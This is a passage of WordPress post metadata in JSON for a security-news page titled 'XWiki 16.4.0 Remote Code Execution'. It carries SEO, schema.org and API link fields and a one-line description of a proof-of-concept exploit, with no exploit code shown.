redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39432","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:17:54&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a critical template injection vulnerability in XWiki Platform that allows unauthenticated remote code execution. The vulnerability affects XWiki versions 5.3-milestone-2...","og_url":"https:\/\/zero.redgem.net\/?p=39432","og_site_name":"zero redgem","article_published_time":"2026-02-06T13:32:41+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39432#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39432"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049","datePublished":"2026-02-06T13:32:41+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39432"},"wordCount":1998,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39432#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39432","url":"https:\/\/zero.redgem.net\/?p=39432","name":"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-06T13:32:41+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39432#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39432"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39432#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 XWiki 16.4.0 Remote Code Execution_PACKETSTORM:215049"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39432"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39432\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}